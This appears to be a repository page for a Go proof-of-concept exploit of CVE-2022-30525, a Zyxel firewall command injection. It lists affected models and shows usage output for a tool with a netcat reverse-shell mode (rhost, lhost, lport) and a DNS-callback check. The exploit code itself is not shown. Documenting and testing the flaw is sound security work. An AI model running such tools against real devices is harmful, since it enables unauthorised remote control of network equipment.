CVE-2022-30525 PoC — Zyxel USG FLEX OS Command Injection Vulnerability

Associated Vulnerability
Title: Zyxel USG FLEX OS Command Injection Vulnerability (CVE-2022-30525)
Description: An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
Description
Proof-of-concept exploit for CVE-2022-30525 (Zyxel firewall command injection)
Readme
# CVE-2022-30525

Zyxel firewall unauthenticated remote command injection vulnerability

## Affected components
- USG FLEX 100, 100W, 200, 500, 700
- USG20-VPN, USG20W-VPN
- ATP 100, 200, 500, 700, 800

## Firmware versions
- ZLD5.00 thru ZLD5.21 Patch 1
- ZLD5.10 thru ZLD5.21 Patch 1
- ZLD5.10 thru ZLD5.21 Patch


## help

```shell
[root@localhost ~]# ./CVE-2022-30525 -h
NAME:
   CVE-2022-30525 - Zyxel Firewall Command Injection (CVE-2022-30525)

USAGE:
   CVE-2022-30525 [global options] command [command options] [arguments...]

COMMANDS:
   nc         use netcat listener
   dnslog, d  USE DNSLog
   help, h    Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h  show help (default: false)


[root@localhost ~]# ./CVE-2022-30525 nc -h
NAME:
   CVE-2022-30525 nc - use netcat listener

USAGE:
   CVE-2022-30525 nc [command options] [arguments...]

OPTIONS:
   --rhost value     The remote address to exploit
   --rport value     The remote port to exploit (default: 443)
   --lhost value     The local address to connect back to
   --lport value     The local port to connect back to (default: 1270)
   --protocol value  The protocol handler to use (default: https://)
   --ncpath value    The path to nc (default: /usr/bin/nc)
   --help, -h        show help (default: false)


[root@localhost ~]# ./CVE-2022-30525 dnslog "http://192.168.0.123"

```
File Snapshot

```
[4.0K] /data/pocs/362c9eec745bd775e124b1623026c6cab549b8da
├── [3.4K] CVE-2022-30525.go
├── [4.0K] dnslog
│   └── [ 758] dnslog.go
├── [ 449] go.mod
└── [1.3K] README.md

1 directory, 4 files
```